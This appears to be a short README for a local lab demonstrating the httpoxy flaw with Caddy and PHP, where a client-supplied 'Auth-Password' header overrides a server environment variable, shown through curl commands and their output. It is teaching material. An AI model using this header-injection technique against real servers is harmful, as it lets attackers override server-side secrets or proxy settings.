A simple example of the httpoxy exploit. This example uses HTTP_AUTH_PASSWORD
instead of HTTP_PROXY
because PHP blacklisted the latter.
- Install Caddy.
- Install PHP and start php-fpm on port 9000.
- Copy
Caddyfile
andindex.php
from this example into a directory. - Start Caddy: just type
caddy
in the directory from the last step.
If you run curl localhost:8080
The server will output the value of HTTP_AUTH_PASSWORD
we set in the Caddyfile
. If you pass the Auth-Password
header it will override the environment variable.
» curl localhost:8080
string(9) "secret123"
» curl -H 'Auth-Password: hunter2' localhost:8080
string(7) "hunter2"